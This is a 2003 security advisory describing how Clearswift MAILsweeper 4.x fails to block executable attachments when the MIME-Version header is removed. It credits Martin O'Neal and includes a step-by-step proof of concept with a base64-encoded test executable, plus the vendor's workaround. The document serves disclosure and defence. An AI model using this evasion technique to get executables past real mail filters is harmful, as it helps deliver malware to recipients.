Content Bypass Vulnerability in Clearswift MAILsweeper

Reported March 3, 2003, by Martin O’Neal.

 

 

VERSIONS AFFECTED

 

• Clearswift MAILsweeper 4.x for Windows NT/2000

 

DESCRIPTION

 

A vulnerability exists in Clearswift’s MAILsweeper 4.x that could result in the bypass of the attachment blocking feature on the vulnerable server. If a deliberately malformed MIME encapsulation technique is used, then the MAILsweeper product will not recognize the attachment and allows it to pass.

 

DEMONSTRATION

 

The discover posted the following steps as proof of concept:

 

-- Proof of concept --

For this proof of concept, the MIME encapsulation is simply modified to 

remove the MIME-Version header field. An example of an application that 

will process a MIME construct that is malformed in this way is Microsoft Internet Explorer.

Whilst RFC2045 states that all agents must include this field \[2\] it 

then goes on to say that "In the absence of a MIME-Version field, a 

receiving mail user agent (whether conforming to MIME requirements or 

not) may optionally choose to interpret the body of the message 

according to local conventions."

Step 1: On the MAILsweeper host create a new Data Type Manager with only the Executable type selected. Save and restart the MAILsweeper Security service.

Step 2: Now create a text file that will be used to hold the MIME 

encoded attachment. Start notepad (or another text editor), and paste 

in:

     MIME-Version: 1.0

     Content-Location:file:///executable.exe

     Content-Transfer-Encoding: base64

     TVp0AQIAAAAgAAgA//8YAIAAAAAQAAIAHgAAAAEAAAAAA

     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

     AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

     AAAAAAAC4AQCO2I0WAgC0Cc0huCBMzSFFeGUhJCQJALH/

     /////wAAAAAAAFQBAAAAAAIAUkKL6IzABRAADh+jBAADB

     gwAjsCLDgYAi/lPi/f986RQuDQAUMuMw4zYSI7YjsC/Dw

     C5EACw//OuR4v3i8NIjsC/DwCxBIvG99DT6IzaK9BzBIz

     YK9LT4APwjtqLx/fQ0+iMwivQcwSMwCvS0+AD+I7CrIrQ

     Tq2LyEaKwiT+PLB1BazzqusGPLJ1bfOkisKoAXSxvjIBD

     h+LHgQA/DPSrYvI4xOLwgPDjsCti/iD//90ESYBHeLzgf

     oA8HQWgcIAEOvcjMBAjsCD7xAmAR1IjsDr4ovDiz4IAIs

     2CgAD8AEGAgAtEACO2I7AuwAA+o7Wi+f7i8Uu/y+0QLsC

     ALkWAIzKjtq6HAHNIbj/TM0hUGFja2VkIGZpbGUgaXMgY

     29ycnVwdAEAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

     AAAAAAAAA=

Step 3: To reproduce this issue, send an email containing the attachment created in step 2 that will be processed by the scenario from step 1. This should result in a successful discovery condition. 

Step 4: Reopen the attachment from step 2 and remove the first line 

(MIME-Version: 1.0), then resend the attachment as per step 3. This 

should result in the attachment not being spotted as an executable.

 

VENDOR RESPONSE

 

The vendor, Clearswift, has made an updated script utility available that can detect the malformed MIME header used in this vulnerability. As a workaround, this should be implemented until a fix or patch is available.

 

 

CREDIT          

Discovered by Martin O'Neal.